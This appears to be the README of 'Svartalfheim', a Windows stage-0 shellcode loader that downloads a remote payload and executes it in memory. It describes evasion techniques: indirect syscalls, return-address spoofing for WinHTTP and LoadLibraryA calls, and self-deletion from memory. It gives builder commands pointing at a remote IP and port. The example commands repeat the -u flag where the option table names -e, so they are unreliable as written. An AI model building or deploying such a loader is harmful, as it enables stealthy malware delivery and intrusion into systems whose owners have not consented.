Svartalfheim

Stage 0 Shellcode to Download a Remote Payload and Execute it in Memory

The Nt API calls NtAllocateVirtualMemory and NtProtectVirtualMemory are made using indirect syscalls.

LoadLibraryA and WinHTTP calls are performed with return address spoofing.

When the shellcode is executed in a spoofed thread, the stage 0 self-deletes from memory.

Usage

Option	Description	Required	Default Value
-e	Http endpoint	Yes
-u	Http uri	Yes
-p	Http port	Yes
-a	User agent	No	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-s	Use TLS	No	Empty
-v	View shellcode at C format	No	Empty

Example :

• python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80
• python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s
• python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 8080 -v

Credit

• https://github.com/kyleavery/AceLdr
• https://github.com/realoriginal/titanldr-ng
• https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html
• https://github.com/trickster0/TartarusGate